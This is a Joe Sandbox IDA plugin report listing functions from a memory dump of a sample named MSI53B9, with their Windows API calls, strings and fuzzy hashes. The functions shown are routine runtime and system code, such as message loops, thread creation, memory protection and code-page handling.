Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 395ca92f2642b4175161bef91ddb4976c88df901ab360eedf88d6689c9954d1c
Instruction ID: bf81a57fdf919e1d12dd5c2f3ddd45d471c25cb016912e1e758ca3a148416fdb
Opcode Fuzzy Hash: 395ca92f2642b4175161bef91ddb4976c88df901ab360eedf88d6689c9954d1c
Instruction Fuzzy Hash: E701FC32725226ABDB215B799C48E6A7798FF457B2B140630F906E7640D720D800CAD4

Function 0088991E Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088992F
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00889940
TranslateMessage.USER32(?), ref: 0088994A
DispatchMessageW.USER32(?), ref: 00889954

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 5edb2d00dd040efcc08b449f050ccbe5cbc2d0d53169c0d536c96b418f1eeedc
Instruction ID: 40378df34ec88d338b93cee452d734be7aa2a81a09c8dc10e276952ee71ddbda
Opcode Fuzzy Hash: 5edb2d00dd040efcc08b449f050ccbe5cbc2d0d53169c0d536c96b418f1eeedc
Instruction Fuzzy Hash: 4DE0ED72C0212EA79B24ABE6AC4CCEF7FACFE072657004015B519D2800D7789506C7F1

Function 0087DF34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0087DEB5: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 0087DED4
Part of subcall function 0087DEB5: GetProcAddress.KERNEL32(008B1E58,CryptUnprotectMemory), ref: 0087DEE4

GetCurrentProcessId.KERNEL32(?,?,?,0087DF2E), ref: 0087DFB5

Strings

CryptProtectMemory failed, xrefs: 0087DF75
CryptUnprotectMemory failed, xrefs: 0087DFAD

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 5235d1d7bb18a760fa3fe7a86a7a20fcfba6bf31a3b0bb00a60b0dfff6a785f7
Instruction ID: b5b0e4e4b82032ad87401a85b76c87589b6d7f77c5f00229274ceab047271d41
Opcode Fuzzy Hash: 5235d1d7bb18a760fa3fe7a86a7a20fcfba6bf31a3b0bb00a60b0dfff6a785f7
Instruction Fuzzy Hash: C8117A7130C7162BEB119B39CC10E6A33A9FF95B58B04C019F80EDF18AEF60EC008691

Function 0087FBB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0087FBD5
SetThreadPriority.KERNEL32(?,00000000), ref: 0087FC1C

Part of subcall function 00876DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876DF1

Strings

CreateThread failed, xrefs: 0087FBE1

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: c79dac411fd48f37d9cb2093cd3a0218d06a552da4fa291e50051d1c5f1ae086
Instruction ID: 42503b99fc6412158ee9d8e102236866adee3936efd3e5e16ff085e800532db9
Opcode Fuzzy Hash: c79dac411fd48f37d9cb2093cd3a0218d06a552da4fa291e50051d1c5f1ae086
Instruction Fuzzy Hash: AA0126713047096FE3206F59DC42F627799FB82721F10443EFB46D2585DAE2E8418631

Function 00879BC8 Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,0087C853,00000001,?,?,?,00000000,0088420B,?,?,?,?,?,00883CB0), ref: 00879BE3
WriteFile.KERNEL32(?,00000000,?,00883EB8,00000000,?,?,00000000,0088420B,?,?,?,?,?,00883CB0,?), ref: 00879C23
WriteFile.KERNELBASE(?,00000000,?,00883EB8,00000000,?,00000001,?,?,0087C853,00000001,?,?,?,00000000,0088420B), ref: 00879C50

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 7136e9d5fbc78980258ff638680bacaf39a676440288682bd015f1338de91c8d
Instruction ID: 8d4bda59bbc8662aeef6f2a075165d04afab1823cc9d88fcc4b400e38a04e6ca
Opcode Fuzzy Hash: 7136e9d5fbc78980258ff638680bacaf39a676440288682bd015f1338de91c8d
Instruction Fuzzy Hash: 62314571108619AFEF21CE18D848BA6BBE8FB92710F00C119F5D8D75D4C735E848CBA2

Function 00879E86 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EAD
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EE0
GetLastError.KERNEL32(?,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EFD

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 5435fb96cf973c5f4e7c2cd3caf2066077c2417503a59fd7965e1ae71dd9b65a
Instruction ID: 52cab8d1b6a8c4399c6e7acb9cf12eecc962a21236cbdac250c7466c1ce9e910
Opcode Fuzzy Hash: 5435fb96cf973c5f4e7c2cd3caf2066077c2417503a59fd7965e1ae71dd9b65a
Instruction Fuzzy Hash: 2F01F532110158A6EB21EA6C8C45FFF374DFF06341F088411F88DD2499DBA0C98197E2

Function 00873AA3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00873AA8

Strings

CMT, xrefs: 00873AB7

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 211cce19b02a4b64e2e32533660922a1d2c9d9c1ec5ac832d954b139aa29aeb3
Instruction ID: 0619b2a9dfc0c15bdbe2b9396d08142789a16bb74059be3bd6ef0ef0d3f2a4ed
Opcode Fuzzy Hash: 211cce19b02a4b64e2e32533660922a1d2c9d9c1ec5ac832d954b139aa29aeb3
Instruction Fuzzy Hash: F8619E71504F44AADB21DB78CC459E7BBE8FB14301F44896EE1AEC7146DB32AA48DF12

Function 008982C3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008982E8

Strings

, xrefs: 0089832D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 26aa8535b1d4bd339781095f99999a5193a2298daeb5c0e0ba3434bd5e562f64
Instruction ID: 8ac48a68a39c1f28c0d7239cb4a4cafc976748d93df859cc228f943295a8a216
Opcode Fuzzy Hash: 26aa8535b1d4bd339781095f99999a5193a2298daeb5c0e0ba3434bd5e562f64
Instruction Fuzzy Hash: B641197050424DDBDF229E288C84AFABBA9FF46708F5804EDE58AC6242D6359945DF60

Function 00871DA1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00871DA6

Part of subcall function 00873AA3: __EH_prolog.LIBCMT ref: 00873AA8

Strings

CMT, xrefs: 00871DDC

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: e97a60b69dfc66552a25e425fbeb9ed466ce15a455e7f9ec0ddd5e1e5fbf2be6
Instruction ID: 7ee73e44629623c249d77b91b180c5e8cc7bf05d372c08d783b39e0bda7340d1
Opcode Fuzzy Hash: e97a60b69dfc66552a25e425fbeb9ed466ce15a455e7f9ec0ddd5e1e5fbf2be6
Instruction Fuzzy Hash: 702126729002099BCF15EF9CC9459EEFBF6FF58300B104069E849A3665CB329A14DB62

Function 008718FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008718FB

Strings

CMT, xrefs: 00871974

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: cda8656a9cb1b038c8b721a5148752aade52a9bfc556fe90137b9dac0dcadd3a
Instruction ID: 97740e4653805c1838568176ebc8f9a8746cd7681c13afa2199961a61181930a
Opcode Fuzzy Hash: cda8656a9cb1b038c8b721a5148752aade52a9bfc556fe90137b9dac0dcadd3a
Instruction Fuzzy Hash: F311AE70A00205AFDF04DF6CC499ABEFBBAFF95300F44805AE409D7645DB30D952DA61

Function 00897A09 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00897A7A

Strings

LCMapStringEx, xrefs: 00897A1A, 00897A24

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 922623a428a7fbd3041b203b36c7a866382d9e24a78abb0b6b1eae0df8ed89f8
Instruction ID: 4bf4c54f17bf75dc0481763709e557901f3fea2ac1356b5b578069f23c531065
Opcode Fuzzy Hash: 922623a428a7fbd3041b203b36c7a866382d9e24a78abb0b6b1eae0df8ed89f8
Instruction Fuzzy Hash: 49011372500219BBDF02AF94DC06EEE7FA2FB49710F044114FE19A5260CA369A31AB85

Function 008979A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0089709A), ref: 008979F2

Strings

InitializeCriticalSectionEx, xrefs: 008979C2

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 9da74f3dd0469c2c0f592cca11339211b6623126aab14a048aab7c7cb83aa8cb
Instruction ID: 708dfcaee2da512f09c94db44626926ccb4df6fb98a152268dc8535a8eaac067
Opcode Fuzzy Hash: 9da74f3dd0469c2c0f592cca11339211b6623126aab14a048aab7c7cb83aa8cb
Instruction Fuzzy Hash: B5F0B47164521CBBDF117F54DC06DAE7F61FF45710B404124FC1596660DA754E109BC5

Function 0089784C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0089788B

Strings

FlsAlloc, xrefs: 00897867

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: e38dab7453c66bec8f2015f32451147af9d709f668e36e754defd25ae3edd96e
Instruction ID: 641f4491086d4c6e38b7f8aff714c4f540e2810e364e544aaabf60b56bfc886d
Opcode Fuzzy Hash: e38dab7453c66bec8f2015f32451147af9d709f668e36e754defd25ae3edd96e
Instruction Fuzzy Hash: 32E0E574B452187BAB15BF649C0A96EBB94FB46720F440174FD05E6740DE751E00C6CA

Function 00891D9A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00891DAF

Strings

FlsAlloc, xrefs: 00891D9E, 00891DA8

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 847cac18e61ead5d1028cad3fdee97c598cc7e1809a2b526d1bd1271403d125c
Instruction ID: b64852a23953162d0ce4a734e20549e2967b8f2bb1ac8ee7a1c6c126800dc326
Opcode Fuzzy Hash: 847cac18e61ead5d1028cad3fdee97c598cc7e1809a2b526d1bd1271403d125c
Instruction Fuzzy Hash: F0D02B21B823396AAF0036C4AC0A9DA7F54FB01BF1F080061FF1CE1B82C995140086C2

Function 00876564 Relevance: 3.2, APIs: 2, Instructions: 187COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 008765B8
_strlen.LIBCMT ref: 00876613

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _memcmp_strlen
String ID:
API String ID: 2682527083-0
Opcode ID: b71ecdd88bce517b7f0656c2b77f13aa3bf308a9d3532200eb935cbb4948c9c2
Instruction ID: b8a50c571b99611c5082dd33f22f2987b6438d63b5f22563744c3607b4685d03
Opcode Fuzzy Hash: b71ecdd88bce517b7f0656c2b77f13aa3bf308a9d3532200eb935cbb4948c9c2
Instruction Fuzzy Hash: AB51D3B2504704ABD720EA64DC89FDBB7ECFB89300F04492EF68DD6146EA71E554C762

Function 00898618 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 008981EB: GetOEMCP.KERNEL32(00000000,?,?,00898474,?), ref: 00898216

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008984B9,?,00000000), ref: 0089868C
GetCPInfo.KERNEL32(00000000,008984B9,?,?,?,008984B9,?,00000000), ref: 0089869F

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: e0597cbf37d85d1e85ae0b0bc0198c747c95f519085818ad574ca00af393d69a
Instruction ID: 9d3b420311e28744015d7298d523c78bb42a99fedb93601c29e9e3f8b6ecbd13
Opcode Fuzzy Hash: e0597cbf37d85d1e85ae0b0bc0198c747c95f519085818ad574ca00af393d69a
Instruction Fuzzy Hash: 4E51227090024AEEDF21AFB5C885ABABBE5FF52314F2C406ED086CB651DA359941CB91

Function 00871383 Relevance: 3.1, APIs: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00871383

Part of subcall function 00875FB1: __EH_prolog.LIBCMT ref: 00875FB6

Part of subcall function 0087C413: __EH_prolog.LIBCMT ref: 0087C418
Part of subcall function 0087C413: new.LIBCMT ref: 0087C45B
Part of subcall function 0087C413: new.LIBCMT ref: 0087C47F

new.LIBCMT ref: 008713FB

Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ebfc82be96a60e9896af77f771c42496d5c46aca29b3dab0526abb154ee9ea85
Instruction ID: b5b24abcc5db96e124bf3b9f3521f53cec6c078e51af2448bae344828a025b5e
Opcode Fuzzy Hash: ebfc82be96a60e9896af77f771c42496d5c46aca29b3dab0526abb154ee9ea85
Instruction Fuzzy Hash: B94116B0805B409ED724DF7984859E6FBE5FF28300F50896ED5EEC7282CB32A554CB15

Function 0087137E Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00871383

Part of subcall function 00875FB1: __EH_prolog.LIBCMT ref: 00875FB6

Part of subcall function 0087C413: __EH_prolog.LIBCMT ref: 0087C418
Part of subcall function 0087C413: new.LIBCMT ref: 0087C45B
Part of subcall function 0087C413: new.LIBCMT ref: 0087C47F

new.LIBCMT ref: 008713FB

Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 63445c4a1e158e5fc306531120d1cfdc6728c8287cb1990bcf44b35309402fa3
Instruction ID: 22fa74d10d65f64aac4edd4b4eef074dade7d23098ffab7602bf20dcbea4a09d
Opcode Fuzzy Hash: 63445c4a1e158e5fc306531120d1cfdc6728c8287cb1990bcf44b35309402fa3
Instruction Fuzzy Hash: 784117B0805B409ED724DF798485AE6FBE5FF28300F50896ED5EEC7282CB726554CB16

Function 00898457 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0089631F: GetLastError.KERNEL32(?,008ACBE8,00892674,008ACBE8,?,?,00892213,?,?,008ACBE8), ref: 00896323
Part of subcall function 0089631F: _free.LIBCMT ref: 00896356
Part of subcall function 0089631F: SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896397
Part of subcall function 0089631F: _abort.LIBCMT ref: 0089639D

Part of subcall function 00898576: _abort.LIBCMT ref: 008985A8
Part of subcall function 00898576: _free.LIBCMT ref: 008985DC

Part of subcall function 008981EB: GetOEMCP.KERNEL32(00000000,?,?,00898474,?), ref: 00898216

_free.LIBCMT ref: 008984CF
_free.LIBCMT ref: 00898505

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: b054bb888ee7d0cf0dd39ae527810503f4394f277f8a89c32fa883ce1b6fb282
Instruction ID: 0103f73d61112f67b6299efc24f743561099f8d6ba478656a57a7b2d1f063a0e
